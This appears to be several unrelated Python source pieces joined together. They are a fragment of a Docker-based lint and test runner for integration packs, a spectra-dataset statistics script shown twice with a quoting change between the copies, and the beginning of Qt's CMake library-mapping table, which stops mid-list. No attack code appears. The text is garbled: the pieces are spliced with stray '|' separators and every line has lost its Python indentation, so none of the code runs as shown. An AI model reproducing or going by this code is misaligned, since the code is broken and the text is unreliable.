print(f"{log_prompt} - Container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to remove container {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run pytest container {e}")
exit_code = RERUN
return exit_code, output, test_json
def _docker_run_pwsh_analyze(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Powershell code analyze in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after excution finished
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Powershell analyze - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pwsh-analyze"
# Check if previous run left container a live if it do, we remove it
container_obj: docker.models.containers.Container
try:
container_obj = self._docker_client.containers.get(container_name)
container_obj.remove(force=True)
except docker.errors.NotFound:
pass
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj = self._docker_client.containers.run(name=container_name,
image=test_image,
command=build_pwsh_analyze_command(
self._facts["lint_files"][0]),
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code:
# 1-fatal message issued
# 2-Error message issued
logger.info(f"{log_prompt} - Finished errors found")
output = container_log
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
exit_code = RERUN
return exit_code, output
def _update_support_level(self):
pack_dir = self._pack_abs_dir.parent if self._pack_abs_dir.parts[-1] == INTEGRATIONS_DIR else \
self._pack_abs_dir.parent.parent
pack_meta_content: Dict = json.load((pack_dir / PACKS_PACK_META_FILE_NAME).open())
self._facts['support_level'] = pack_meta_content.get('support')
if self._facts['support_level'] == 'partner' and pack_meta_content.get('Certification'):
self._facts['support_level'] = 'certified partner'
def _docker_run_pwsh_test(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Powershell tests in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after excution finished
Returns:
int: 0 on successful, errors 1, neet to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Powershell test - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pwsh-test"
# Check if previous run left container a live if it do, we remove it
self._docker_remove_container(container_name)
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj: docker.models.containers.Container = self._docker_client.containers.run(name=container_name,
image=test_image,
command=build_pwsh_test_command(),
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code:
# 1-fatal message issued
# 2-Error message issued
logger.info(f"{log_prompt} - Finished errors found")
output = container_log
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run powershell test - {e}")
exit_code = RERUN
return exit_code, output
def _get_commands_list(self, script_obj: dict):
""" Get all commands from yml file of the pack
Args:
script_obj(dict): the script section of the yml file.
Returns:
list: list of all commands
"""
commands_list = []
try:
commands_obj = script_obj.get('commands', {})
for command in commands_obj:
commands_list.append(command.get('name', ''))
except Exception:
logger.debug("Failed getting the commands from the yml file")
return commands_list
|
import sys
import time
import h5py
import argparse
import numpy as np
from skimage.metrics import peak_signal_noise_ratio as psnr
from spectra_utils import split_radionuclide_name, plot_data
def load_data(datafile, det, show_data=False):
with h5py.File(datafile, 'r') as h5f:
assert h5f[det]["spectrum"].shape == h5f[det]["noisy_spectrum"].shape, f'Mismatch between training examples and target examples'
dataset = {"name": h5f[det]["name"][()], "keV": h5f[det]["keV"][()], "spectrum": h5f[det]["spectrum"][()], \
"noisy_spectrum": h5f[det]["noisy_spectrum"][()], "noise": h5f[det]["noise"][()], \
"compton_scale": h5f[det]["compton_scale"][()], "noise_scale": h5f[det]["noise_scale"][()]}
if show_data:
plot_data(dataset)
return dataset
def dataset_stats(dataset, det):
print(f'Dataset {det}:')
print(f'\tfeatures: {dataset['keV'].shape}')
print(f'\tclean spectra: {dataset['spectrum'].shape}')
print(f'\tnoisy spectra: {dataset['noisy_spectrum'].shape}')
print(f'\tnoise: {dataset['noise'].shape}')
print(f'\tmin Compton scale: {np.min(dataset['compton_scale'])}')
print(f'\tmax Compton scale: {np.max(dataset['compton_scale'])}')
print(f'\tmin Noise scale: {np.min(dataset['noise_scale'])}')
print(f'\tmax Noise scale: {np.max(dataset['noise_scale'])}')
noisy_spectra = dataset['noisy_spectrum']
clean_spectra = dataset['spectrum']
min_psnr = 9999.0
max_psnr = 0.0
for clean, noisy in zip(clean_spectra, noisy_spectra):
noisy_psnr = psnr(clean, noisy)
if noisy_psnr < min_psnr:
min_psnr = noisy_psnr
if noisy_psnr > max_psnr:
max_psnr = noisy_psnr
print(f'\tmax PSNR {max_psnr:.2f} dB')
print(f'\tmin PSNR {min_psnr:.2f} dB')
def main():
start = time.time()
parser = argparse.ArgumentParser()
parser.add_argument("-df", "--datafile", help="data file containing templates", default="data/training.h5")
parser.add_argument("-det", "--dettype", help="detector type", default="HPGe")
parser.add_argument("-sf", "--showfigs", help="saves plots of data", default=False, action="store_true")
arg = parser.parse_args()
print(f'Loading data set from {arg.datafile}')
dataset = load_data(arg.datafile, arg.dettype.upper(), show_data=arg.showfigs)
print(f'{len(dataset['name'])} examples in dataset.')
dataset_stats(dataset, arg.dettype)
print(f'\nScript completed in {time.time()-start:.2f} secs')
return 0
if __name__ == '__main__':
sys.exit(main())
| import sys
import time
import h5py
import argparse
import numpy as np
from skimage.metrics import peak_signal_noise_ratio as psnr
from spectra_utils import split_radionuclide_name, plot_data
def load_data(datafile, det, show_data=False):
with h5py.File(datafile, 'r') as h5f:
assert h5f[det]["spectrum"].shape == h5f[det]["noisy_spectrum"].shape, f'Mismatch between training examples and target examples'
dataset = {"name": h5f[det]["name"][()], "keV": h5f[det]["keV"][()], "spectrum": h5f[det]["spectrum"][()], \
"noisy_spectrum": h5f[det]["noisy_spectrum"][()], "noise": h5f[det]["noise"][()], \
"compton_scale": h5f[det]["compton_scale"][()], "noise_scale": h5f[det]["noise_scale"][()]}
if show_data:
plot_data(dataset)
return dataset
def dataset_stats(dataset, det):
print(f'Dataset {det}:')
print(f'\tfeatures: {dataset["keV"].shape}')
print(f'\tclean spectra: {dataset["spectrum"].shape}')
print(f'\tnoisy spectra: {dataset["noisy_spectrum"].shape}')
print(f'\tnoise: {dataset["noise"].shape}')
print(f'\tmin Compton scale: {np.min(dataset["compton_scale"])}')
print(f'\tmax Compton scale: {np.max(dataset["compton_scale"])}')
print(f'\tmin Noise scale: {np.min(dataset["noise_scale"])}')
print(f'\tmax Noise scale: {np.max(dataset["noise_scale"])}')
noisy_spectra = dataset['noisy_spectrum']
clean_spectra = dataset['spectrum']
min_psnr = 9999.0
max_psnr = 0.0
for clean, noisy in zip(clean_spectra, noisy_spectra):
noisy_psnr = psnr(clean, noisy)
if noisy_psnr < min_psnr:
min_psnr = noisy_psnr
if noisy_psnr > max_psnr:
max_psnr = noisy_psnr
print(f'\tmax PSNR {max_psnr:.2f} dB')
print(f'\tmin PSNR {min_psnr:.2f} dB')
def main():
start = time.time()
parser = argparse.ArgumentParser()
parser.add_argument("-df", "--datafile", help="data file containing templates", default="data/training.h5")
parser.add_argument("-det", "--dettype", help="detector type", default="HPGe")
parser.add_argument("-sf", "--showfigs", help="saves plots of data", default=False, action="store_true")
arg = parser.parse_args()
print(f'Loading data set from {arg.datafile}')
dataset = load_data(arg.datafile, arg.dettype.upper(), show_data=arg.showfigs)
print(f'{len(dataset["name"])} examples in dataset.')
dataset_stats(dataset, arg.dettype)
print(f'\nScript completed in {time.time()-start:.2f} secs')
return 0
if __name__ == '__main__':
sys.exit(main())
|
#############################################################################
##
## Copyright (C) 2018 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the plugins of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
import re
import typing
class LibraryMapping:
def __init__(
self,
soName: str,
packageName: typing.Optional[str],
targetName: typing.Optional[str],
*,
resultVariable: typing.Optional[str] = None,
extra: typing.List[str] = [],
appendFoundSuffix: bool = True,
emit_if: str = "",
is_bundled_with_qt: bool = False,
test_library_overwrite: str = "",
run_library_test: bool = False,
no_link_so_name: str = "",
) -> None:
self.soName = soName
self.packageName = packageName
self.resultVariable = resultVariable
self.appendFoundSuffix = appendFoundSuffix
# Allows passing addiitonal arguments to the generated find_package call.
self.extra = extra
self.targetName = targetName
# True if qt bundles the library sources as part of Qt.
self.is_bundled_with_qt = is_bundled_with_qt
# if emit_if is non-empty, the generated find_package call
# for a library will be surrounded by this condition.
self.emit_if = emit_if
# Allow overwriting library name when used with tests. E.g.: _nolink
# targets do not exist when used during compile tests
self.test_library_overwrite = test_library_overwrite
# Run the library compile test of configure.json
self.run_library_test = run_library_test
# The custom nolink library mapping associated with this one.
self.no_link_so_name = no_link_so_name
def is_qt(self) -> bool:
return self.packageName == "Qt" or self.packageName == "Qt5" or self.packageName == "Qt6"
_qt_library_map = [
# Qt:
LibraryMapping(
"androidextras", "Qt6", "Qt::AndroidExtras", extra=["COMPONENTS", "AndroidExtras"]
),
LibraryMapping("3danimation", "Qt6", "Qt::3DAnimation", extra=["COMPONENTS", "3DAnimation"]),
LibraryMapping("3dcore", "Qt6", "Qt::3DCore", extra=["COMPONENTS", "3DCore"]),
LibraryMapping("3dcoretest", "Qt6", "Qt::3DCoreTest", extra=["COMPONENTS", "3DCoreTest"]),
LibraryMapping("3dextras", "Qt6", "Qt::3DExtras", extra=["COMPONENTS", "3DExtras"]),
LibraryMapping("3dinput", "Qt6", "Qt::3DInput", extra=["COMPONENTS", "3DInput"]),
LibraryMapping("3dlogic", "Qt6", "Qt::3DLogic", extra=["COMPONENTS", "3DLogic"]),
LibraryMapping("3dquick", "Qt6", "Qt::3DQuick", extra=["COMPONENTS", "3DQuick"]),
LibraryMapping(
"3dquickextras", "Qt6", "Qt::3DQuickExtras", extra=["COMPONENTS", "3DQuickExtras"]
),
LibraryMapping("3dquickinput", "Qt6", "Qt::3DQuickInput", extra=["COMPONENTS", "3DQuickInput"]),
LibraryMapping(
"3dquickrender", "Qt6", "Qt::3DQuickRender", extra=["COMPONENTS", "3DQuickRender"]
),
LibraryMapping("3drender", "Qt6", "Qt::3DRender", extra=["COMPONENTS", "3DRender"]),
LibraryMapping(
"application-lib", "Qt6", "Qt::AppManApplication", extra=["COMPONENTS", "AppManApplication"]
),
LibraryMapping("axbase", "Qt6", "Qt::AxBase", extra=["COMPONENTS", "AxBase"]),
LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
LibraryMapping("axserver", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
LibraryMapping("bluetooth", "Qt6", "Qt::Bluetooth", extra=["COMPONENTS", "Bluetooth"]),
LibraryMapping("bootstrap", "Qt6", "Qt::Bootstrap", extra=["COMPONENTS", "Bootstrap"]),
# bootstrap-dbus: Not needed in Qt6!
LibraryMapping("client", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]),
LibraryMapping("coap", "Qt6", "Qt::Coap", extra=["COMPONENTS", "Coap"]),
LibraryMapping("common-lib", "Qt6", "Qt::AppManCommon", extra=["COMPONENTS", "AppManCommon"]),
LibraryMapping(
"compositor", "Qt6", "Qt::WaylandCompositor", extra=["COMPONENTS", "WaylandCompositor"]
),
LibraryMapping("concurrent", "Qt6", "Qt::Concurrent", extra=["COMPONENTS", "Concurrent"]),
LibraryMapping("container", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
LibraryMapping("control", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
LibraryMapping(
"core_headers", "Qt6", "Qt::WebEngineCore", extra=["COMPONENTS", "WebEngineCore"]
),
LibraryMapping("core", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]),
LibraryMapping("crypto-lib", "Qt6", "Qt::AppManCrypto", extra=["COMPONENTS", "AppManCrypto"]),
LibraryMapping("dbus", "Qt6", "Qt::DBus", extra=["COMPONENTS", "DBus"]),
LibraryMapping("designer", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
LibraryMapping(
"designercomponents",
"Qt6",
"Qt::DesignerComponents",
extra=["COMPONENTS", "DesignerComponents"],
),
LibraryMapping(
"devicediscovery",
"Qt6",
"Qt::DeviceDiscoverySupport",
extra=["COMPONENTS", "DeviceDiscoverySupport"],
),
LibraryMapping(
"devicediscovery_support",
"Qt6",
"Qt::DeviceDiscoverySupport",
extra=["COMPONENTS", "DeviceDiscoverySupport"],
),
LibraryMapping("edid", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
LibraryMapping("edid_support", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
LibraryMapping("eglconvenience", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
LibraryMapping(
"eglfsdeviceintegration",
"Qt6",
"Qt::EglFSDeviceIntegration",
extra=["COMPONENTS", "EglFSDeviceIntegration"],
),
LibraryMapping(
"eglfs_kms_support", "Qt6", "Qt::EglFsKmsSupport", extra=["COMPONENTS", "EglFsKmsSupport"]
),
LibraryMapping(
"eglfs_kms_gbm_support",
"Qt6",
"Qt::EglFsKmsGbmSupport",
extra=["COMPONENTS", "EglFsKmsGbmSupport"],
),
LibraryMapping("egl_support", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
# enginio: Not needed in Qt6!
LibraryMapping(
"eventdispatchers",
"Qt6",
"Qt::EventDispatcherSupport",
extra=["COMPONENTS", "EventDispatcherSupport"],
),
LibraryMapping(
"eventdispatcher_support",
"Qt6",
"Qt::EventDispatcherSupport",
extra=["COMPONENTS", "EventDispatcherSupport"],
),
LibraryMapping("fbconvenience", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
LibraryMapping("fb_support", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
LibraryMapping(
"fontdatabase_support",
"Qt6",
"Qt::FontDatabaseSupport",
extra=["COMPONENTS", "FontDatabaseSupport"],
),
LibraryMapping("gamepad", "Qt6", "Qt::Gamepad", extra=["COMPONENTS", "Gamepad"]),
LibraryMapping(
"global", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]
), # manually added special case
LibraryMapping("glx_support", "Qt6", "Qt::GlxSupport", extra=["COMPONENTS", "GlxSupport"]),
LibraryMapping(
"gsttools", "Qt6", "Qt::MultimediaGstTools", extra=["COMPONENTS", "MultimediaGstTools"]
),
LibraryMapping("gui", "Qt6", "Qt::Gui", extra=["COMPONENTS", "Gui"]),
LibraryMapping("help", "Qt6", "Qt::Help", extra=["COMPONENTS", "Help"]),
LibraryMapping(
"hunspellinputmethod",
"Qt6",
"Qt::HunspellInputMethod",
extra=["COMPONENTS", "HunspellInputMethod"],
),
LibraryMapping("input", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]),
LibraryMapping(
"input_support", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]
),
LibraryMapping(
"installer-lib", "Qt6", "Qt::AppManInstaller", extra=["COMPONENTS", "AppManInstaller"]
),
LibraryMapping("knx", "Qt6", "Qt::Knx", extra=["COMPONENTS", "Knx"]),
LibraryMapping("kmsconvenience", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
LibraryMapping("kms_support", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
LibraryMapping(
"launcher-lib", "Qt6", "Qt::AppManLauncher", extra=["COMPONENTS", "AppManLauncher"]
),
LibraryMapping("lib", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
LibraryMapping(
"linuxaccessibility_support",
"Qt6",
"Qt::LinuxAccessibilitySupport",
extra=["COMPONENTS", "LinuxAccessibilitySupport"],
),
LibraryMapping("location", "Qt6", "Qt::Location", extra=["COMPONENTS", "Location"]),
LibraryMapping("macextras", "Qt6", "Qt::MacExtras", extra=["COMPONENTS", "MacExtras"]),
LibraryMapping("main-lib", "Qt6", "Qt::AppManMain", extra=["COMPONENTS", "AppManMain"]),
LibraryMapping(
"manager-lib", "Qt6", "Qt::AppManManager", extra=["COMPONENTS", "AppManManager"]
),
LibraryMapping(
"monitor-lib", "Qt6", "Qt::AppManMonitor", extra=["COMPONENTS", "AppManMonitor"]
),
LibraryMapping("mqtt", "Qt6", "Qt::Mqtt", extra=["COMPONENTS", "Mqtt"]),
LibraryMapping("multimedia", "Qt6", "Qt::Multimedia", extra=["COMPONENTS", "Multimedia"]),
LibraryMapping(
"multimediawidgets",
"Qt6",
"Qt::MultimediaWidgets",
extra=["COMPONENTS", "MultimediaWidgets"],
),
LibraryMapping("network", "Qt6", "Qt::Network", extra=["COMPONENTS", "Network"]),
LibraryMapping("networkauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
LibraryMapping("nfc", "Qt6", "Qt::Nfc", extra=["COMPONENTS", "Nfc"]),
LibraryMapping("oauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
LibraryMapping("opcua", "Qt6", "Qt::OpcUa", extra=["COMPONENTS", "OpcUa"]),
LibraryMapping(
"opcua_private", "Qt6", "Qt::OpcUaPrivate", extra=["COMPONENTS", "OpcUaPrivate"]
),
LibraryMapping("opengl", "Qt6", "Qt::OpenGL", extra=["COMPONENTS", "OpenGL"]),
LibraryMapping(
"openglwidgets", "Qt6", "Qt::OpenGLWidgets", extra=["COMPONENTS", "OpenGLWidgets"]
),
LibraryMapping(
"package-lib", "Qt6", "Qt::AppManPackage", extra=["COMPONENTS", "AppManPackage"]
),
LibraryMapping(
"packetprotocol", "Qt6", "Qt::PacketProtocol", extra=["COMPONENTS", "PacketProtocol"]
),
LibraryMapping(
"particles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]
),
LibraryMapping(
"plugin-interfaces",
"Qt6",
"Qt::AppManPluginInterfaces",
extra=["COMPONENTS", "AppManPluginInterfaces"],
),
LibraryMapping("positioning", "Qt6", "Qt::Positioning", extra=["COMPONENTS", "Positioning"]),
LibraryMapping(
"positioningquick", "Qt6", "Qt::PositioningQuick", extra=["COMPONENTS", "PositioningQuick"]
),
LibraryMapping("printsupport", "Qt6", "Qt::PrintSupport", extra=["COMPONENTS", "PrintSupport"]),
LibraryMapping("purchasing", "Qt6", "Qt::Purchasing", extra=["COMPONENTS", "Purchasing"]),
LibraryMapping("qmldebug", "Qt6", "Qt::QmlDebug", extra=["COMPONENTS", "QmlDebug"]),
LibraryMapping("qmldevtools", "Qt6", "Qt::QmlDevTools", extra=["COMPONENTS", "QmlDevTools"]),
LibraryMapping("qmlcompiler", "Qt6", "Qt::QmlCompiler", extra=["COMPONENTS", "QmlCompiler"]),
LibraryMapping("qml", "Qt6", "Qt::Qml", extra=["COMPONENTS", "Qml"]),
LibraryMapping("qmldom", "Qt6", "Qt::QmlDom", extra=["COMPONENTS", "QmlDom"]),
LibraryMapping("qmlmodels", "Qt6", "Qt::QmlModels", extra=["COMPONENTS", "QmlModels"]),
LibraryMapping("qmltest", "Qt6", "Qt::QuickTest", extra=["COMPONENTS", "QuickTest"]),
LibraryMapping(
"qtmultimediaquicktools",
"Qt6",
"Qt::MultimediaQuick",
extra=["COMPONENTS", "MultimediaQuick"],
),
LibraryMapping(
"quick3dassetimport",
"Qt6",
"Qt::Quick3DAssetImport",
extra=["COMPONENTS", "Quick3DAssetImport"],
),
LibraryMapping("core5compat", "Qt6", "Qt::Core5Compat", extra=["COMPONENTS", "Core5Compat"]),
LibraryMapping("quick3d", "Qt6", "Qt::Quick3D", extra=["COMPONENTS", "Quick3D"]),
LibraryMapping(
"quick3drender", "Qt6", "Qt::Quick3DRender", extra=["COMPONENTS", "Quick3DRender"]
),
LibraryMapping(
"quick3druntimerender",
"Qt6",
"Qt::Quick3DRuntimeRender",
extra=["COMPONENTS", "Quick3DRuntimeRender"],
),
LibraryMapping("quick3dutils", "Qt6", "Qt::Quick3DUtils", extra=["COMPONENTS", "Quick3DUtils"]),
LibraryMapping(
"quickcontrols2", "Qt6", "Qt::QuickControls2", extra=["COMPONENTS", "QuickControls2"]
),
LibraryMapping(
"quickcontrols2impl",
"Qt6",
"Qt::QuickControls2Impl",
extra=["COMPONENTS", "QuickControls2Impl"],
),
LibraryMapping("quick", "Qt6", "Qt::Quick", extra=["COMPONENTS", "Quick"]),
LibraryMapping("quickshapes", "Qt6", "Qt::QuickShapes", extra=["COMPONENTS", "QuickShapes"]),
LibraryMapping(
"quicktemplates2", "Qt6", "Qt::QuickTemplates2", extra=["COMPONENTS", "QuickTemplates2"]
),
LibraryMapping("quickwidgets", "Qt6", "Qt::QuickWidgets", extra=["COMPONENTS", "QuickWidgets"]),
LibraryMapping(
"remoteobjects", "Qt6", "Qt::RemoteObjects", extra=["COMPONENTS", "RemoteObjects"]
),
LibraryMapping("script", "Qt6", "Qt::Script", extra=["COMPONENTS", "Script"]),
LibraryMapping("scripttools", "Qt6", "Qt::ScriptTools", extra=["COMPONENTS", "ScriptTools"]),
LibraryMapping("scxml", "Qt6", "Qt::Scxml", extra=["COMPONENTS", "Scxml"]),
LibraryMapping("sensors", "Qt6", "Qt::Sensors", extra=["COMPONENTS", "Sensors"]),
LibraryMapping("serialport", "Qt6", "Qt::SerialPort", extra=["COMPONENTS", "SerialPort"]),
LibraryMapping("serialbus", "Qt6", "Qt::SerialBus", extra=["COMPONENTS", "SerialBus"]),
LibraryMapping("services", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]),
LibraryMapping(
"service_support", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]
),
LibraryMapping("shadertools", "Qt6", "Qt::ShaderTools", extra=["COMPONENTS", "ShaderTools"]),
LibraryMapping("sql", "Qt6", "Qt::Sql", extra=["COMPONENTS", "Sql"]),
LibraryMapping("svg", "Qt6", "Qt::Svg", extra=["COMPONENTS", "Svg"]),
LibraryMapping("svgwidgets", "Qt6", "Qt::SvgWidgets", extra=["COMPONENTS", "SvgWidgets"]),
LibraryMapping("charts", "Qt6", "Qt::Charts", extra=["COMPONENTS", "Charts"]),
LibraryMapping("testlib", "Qt6", "Qt::Test", extra=["COMPONENTS", "Test"]),
LibraryMapping("texttospeech", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
LibraryMapping(
"theme_support", "Qt6", "Qt::ThemeSupport", extra=["COMPONENTS", "ThemeSupport"]
),
LibraryMapping("tts", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
LibraryMapping("uiplugin", "Qt6", "Qt::UiPlugin", extra=["COMPONENTS", "UiPlugin"]),
LibraryMapping("uitools", "Qt6", "Qt::UiTools", extra=["COMPONENTS", "UiTools"]),
LibraryMapping(
"virtualkeyboard", "Qt6", "Qt::VirtualKeyboard", extra=["COMPONENTS", "VirtualKeyboard"]
),
LibraryMapping(
"waylandclient", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]
),
LibraryMapping(
"waylandcompositor",
"Qt6",
"Qt::WaylandCompositor",
extra=["COMPONENTS", "WaylandCompositor"],
),
LibraryMapping("webchannel", "Qt6", "Qt::WebChannel", extra=["COMPONENTS", "WebChannel"]),
LibraryMapping("webengine", "Qt6", "Qt::WebEngine", extra=["COMPONENTS", "WebEngine"]),
LibraryMapping(
"webenginewidgets", "Qt6", "Qt::WebEngineWidgets", extra=["COMPONENTS", "WebEngineWidgets"]
),
LibraryMapping("websockets", "Qt6", "Qt::WebSockets", extra=["COMPONENTS", "WebSockets"]),
LibraryMapping("webview", "Qt6", "Qt::WebView", extra=["COMPONENTS", "WebView"]),
LibraryMapping("widgets", "Qt6", "Qt::Widgets", extra=["COMPONENTS", "Widgets"]),
LibraryMapping("window-lib", "Qt6", "Qt::AppManWindow", extra=["COMPONENTS", "AppManWindow"]),
LibraryMapping("winextras", "Qt6", "Qt::WinExtras", extra=["COMPONENTS", "WinExtras"]),
LibraryMapping("x11extras", "Qt6", "Qt::X11Extras", extra=["COMPONENTS", "X11Extras"]),
LibraryMapping("xcb_qpa_lib", "Qt6", "Qt::XcbQpa", extra=["COMPONENTS", "XcbQpa"]),
LibraryMapping(
"xkbcommon_support", "Qt6", "Qt::XkbCommonSupport", extra=["COMPONENTS", "XkbCommonSupport"]
),
LibraryMapping("xmlpatterns", "Qt6", "Qt::XmlPatterns", extra=["COMPONENTS", "XmlPatterns"]),
LibraryMapping("xml", "Qt6", "Qt::Xml", extra=["COMPONENTS", "Xml"]),
LibraryMapping(
"qmlworkerscript", "Qt6", "Qt::QmlWorkerScript", extra=["COMPONENTS", "QmlWorkerScript"]
),
LibraryMapping(
"quickparticles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]
),
LibraryMapping(
"linuxofono_support",
"Qt6",
"Qt::LinuxOfonoSupport",
extra=["COMPONENTS", "LinuxOfonoSupport"],
),
LibraryMapping(
"linuxofono_support_private",
"Qt6",
"Qt::LinuxOfonoSupportPrivate",
extra=["COMPONENTS", "LinuxOfonoSupportPrivate"],
),
LibraryMapping("tools", "Qt6", "Qt::Tools", extra=["COMPONENTS", "Tools"]),
LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
LibraryMapping(
"webkitwidgets", "Qt6", "Qt::WebKitWidgets", extra=["COMPONENTS", "WebKitWidgets"]
),
LibraryMapping("zlib", "Qt6", "Qt::Zlib", extra=["COMPONENTS", "Zlib"]),
LibraryMapping("httpserver", "Qt6", "Qt::HttpServer", extra=["COMPONENTS", "HttpServer"]),
LibraryMapping("sslserver", "Qt6", "Qt::SslServer", extra=["COMPONENTS", "HttpServer"]),
]
# Note that the library map is adjusted dynamically further down.
_library_map = [
# 3rd party:
LibraryMapping("atspi", "ATSPI2", "PkgConfig::ATSPI2"),
LibraryMapping("bluez", "BlueZ", "PkgConfig::BlueZ"),
LibraryMapping("brotli", "WrapBrotli", "WrapBrotli::WrapBrotliDec"),
LibraryMapping("corewlan", None, None),
LibraryMapping("cups", "Cups", "Cups::Cups"),
LibraryMapping("directfb", "DirectFB", "PkgConfig::DirectFB"),
LibraryMapping("db2", "DB2", "DB2::DB2"),
LibraryMapping("dbus", "WrapDBus1", "dbus-1", resultVariable="DBus1", extra=["1.2"]),
LibraryMapping(
"doubleconversion", "WrapDoubleConversion", "WrapDoubleConversion::WrapDoubleConversion"
),
LibraryMapping("drm", "Libdrm", "Libdrm::Libdrm"),
LibraryMapping("egl", "EGL", "EGL::EGL"),
LibraryMapping("flite", "Flite", "Flite::Flite"),
LibraryMapping("flite_alsa", "ALSA", "ALSA::ALSA"),
LibraryMapping(
"fontconfig", "Fontconfig", "Fontconfig::Fontconfig", resultVariable="FONTCONFIG"
),
LibraryMapping(
"freetype",
"WrapFreetype",
"WrapFreetype::WrapFreetype",
extra=["2.2.0", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("gbm", "gbm", "gbm::gbm"),
LibraryMapping("glib", "GLIB2", "GLIB2::GLIB2"),
LibraryMapping("iconv", "WrapIconv", "WrapIconv::WrapIconv"),
LibraryMapping("gtk3", "GTK3", "PkgConfig::GTK3", extra=["3.6"]),
LibraryMapping("gssapi", "GSSAPI", "GSSAPI::GSSAPI"),
LibraryMapping(
"harfbuzz",
"WrapHarfbuzz",
"WrapHarfbuzz::WrapHarfbuzz",
is_bundled_with_qt=True,
extra=["2.6.0"],
),
LibraryMapping("host_dbus", None, None),
LibraryMapping(
"icu", "ICU", "ICU::i18n ICU::uc ICU::data", extra=["COMPONENTS", "i18n", "uc", "data"]
),
LibraryMapping("journald", "Libsystemd", "PkgConfig::Libsystemd"),
